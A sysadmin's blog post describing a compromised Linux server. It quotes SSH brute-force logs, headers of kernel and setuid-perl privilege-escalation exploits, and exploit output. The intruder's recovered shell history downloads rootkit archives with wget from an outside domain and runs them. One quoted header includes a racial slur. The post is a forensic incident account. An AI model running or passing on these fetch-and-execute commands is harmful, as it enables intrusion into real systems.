Viraj's Weblog

I wonder what 1st person shooter that kid is playing in the background.

So I'm logged into a client's Linux system and see a bunch of 'uselib24' processes running by a user 'tester' and taking up all the CPU. Immediately I knew it was hacked.

It turned out this 'tester' was a valid account with a very easy to guess password, and this is how they got in:

... tons of SSH attempts from 194.57.119.197
Nov 2 16:39:03 server sshd[13998]: Failed password for illegal user fax from 194.57.119.197 port 57895 ssh2
Nov 2 16:39:03 server sshd[14000]: Illegal user fax from 194.57.119.197
Nov 2 16:39:07 server sshd[14000]: Failed password for illegal user fax from 194.57.119.197 port 57995 ssh2
Nov 2 16:39:12 server sshd[14002]: Failed password for tester from 194.57.119.197 port 58116 ssh2
Nov 2 16:39:12 server sshd[14004]: Accepted password for tester from 194.57.119.197 port 58213 ssh2

Then later in the logs, tester comes in from a different IP:

Nov 2 20:41:42 server sshd[14574]: Accepted password for tester from 62.162.20.93 port 3132 ssh2

So I check what processes this user is running. I see that he is running screen, and these 'uselib24' processes. Wondering where he ran these from, I just went to /proc/PID and looked at the cwd symlink. It's linked to /var/tmp/.a. I look in there and see all sorts of rootkit exploits, one of them being this uselib24. He even has the C code uselib24.c, and it looks like:

/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu Jan 2005.
....

Let's see, what else. There is a k-rad.c. What's that look like?

/*
* k-rad.c - linux 2.6.11 and below CPL 0 kernel exploit v2
* Discovered and exploit coded Jan 2005 by sd
*
* In memory of pwned.c (uselib)

And then ex_perl2b.c:

/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/

A nice collection of recent exploits. I honestly haven't been keeping up with Bugtraq. There are some other binaries with no source code. I'm able to actually 'screen -r' his session. It's running the uselib24 process, crunching away at trying to find a buffer overflow address. I wanted to use screen's scrollback buffer to get some history, but accidentally did a 'pkill -9 -u tester' in another window. So I only saw the last few things he did:

[tester@server .a]$ chmod 9x uselib24
chmod: invalid mode string: `9x'
[tester@server .a]$ chmod +x uselib24
[tester@server .a]$ ./uselib24

[+] SLAB cleanup
child 1 VMAs 29608
child 2 VMAs 1132
child 3 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc0400000 - 0xc04f97de
Wait... /

~/.bash_history shows some more:

exit
w
uname -a
/sbin/ifconfig
iptables -L
cd /var/tmp
mkdir -p .a
cd .a
wget radovis.com/images/new.tgz
tar zxvf new.tgz
chmod +x hator
wget radovis.com/images/k.zip
unzip k
chmod +x hator
./hator
chmod +x pwned
./pwned
chmod +x a
./a
chmod +x modprobe
./modprobe
./pwned
./a
screen -v
ps -x
ps -aux
screen -v
screen
screen -r
ls -al
chmod 9x uselib24
chmod +x uselib24

So you see he downloaded rootkits from http://www.radovis.com/images/.

Doesn't appear he was able to get root access. Luckily this server is being phased out anyway. Wee, the fun of finding hackers... yawn.